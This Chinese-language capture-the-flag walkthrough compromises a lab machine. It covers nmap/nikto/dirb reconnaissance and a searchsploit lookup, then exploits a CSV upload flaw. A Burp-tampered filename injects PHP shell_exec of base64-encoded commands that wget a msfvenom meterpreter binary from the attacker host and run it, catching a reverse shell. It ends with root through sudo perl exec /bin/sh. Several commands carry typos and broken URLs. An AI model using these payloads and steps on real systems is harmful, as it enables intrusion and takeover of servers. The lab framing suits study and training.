实验环境
攻击机: 192.168.1.106
靶场机器: 192.168.1.104
信息探测
扫描主机服务信息以及服务版本
- nmap -sV 靶场IP地址
快速扫描主机全部信息
-
nmap -T4 -A -v 靶场IP地址
探测目录信息 -
nikto -host http:/ /靶场IP地址端口
-
dirb htp://靶场IP地址端口
打开robots.txt:
尝试打开这五个界面:
此界面源代码如下:
接下来对其他敏感信息进行挖掘
打开浏览器之后发现一个压缩包,将其下载:
然后在网页上发现打开这个压缩包需要密码:
使用前面发现的密码进行尝试,解压成功,但需要通过file命令进行查看,为何种类型的文件
复制url进行打开:
使用前面发现的5个密码进行尝试。登陆到后台的界面:
登录-利用exploitdb
利用挖掘到的用户名和密码登陆系统,然后对系统是否使用某种CMS、SMS等进行查看 。
利用现成的EXP进行渗透。
渗透测试技巧
使用searchsploit来查看系统是否有对应漏洞
searchsploit 对应的系统
使用cat命令进行查看或者也可使用这个网页进行查看漏洞信息
https:/ /www.exploit-db.com/exploits/42003/
发现存在上传漏洞,在网页中打开上传位置
发现send from file,可以上传文件
这里提示上传csv文件,touch 1.csv
上传成功:
打开burpsuite
使用burpsuite,需要先设置浏览器的代理,
在网页中重新上传文件,burpsuite中会出现对应的数据报
准备shell
启用metasploit监听
msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter_reverse_tcp.
msf exploit(handler) > set lhost 192.168.1.106
msf. exploit(handler) > set lport 4444
msf. exploit(handler) > run
exploit开始监听
生成shell
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=1 92.168.1.106 lport =4444 -f elf >
/var/www /html/shell
绕过防火墙 上传shell
利用base64绕过防火墙检测
-- service apache2 start
-- echo 'wget http:/ /攻击机IP地址/shell -O /tmp/shell' | base64
-- echo 'chmod 777 /tmp/shell' | base64
-- echo '/tmp/ shell' | base64
获取反弹shell,不断的上传csv文件,然后用burpsuite截断,并修改信息
使用burpsuite 修改filename参数内容
–“<?php shell_exec(base64_decode("前面加密的信息')); die();?> .php”
查看kali终端的监听效果:
提升权限、获取Flag
登录服务器之后,反弹的shelI的用户是www-data。并不具备roor权限。
使用sude.-I查看www-data用户的sudo权限;
根据提示执行以下命令(现实渗透中,肯定存在这样的问题。程序员为了方便,便设置了不需要密码
就可以执行sudo的操作)
– sudo perl -e "exec ‘/bin/sh’”
– bash -i
查看flag值
cat flag
.
总结:
上传webshell获取控制权
使用burpsuite绕过上传过滤机制,绕过前端检测机制,或%00截断绕过;
执行shell,获取反弹shell.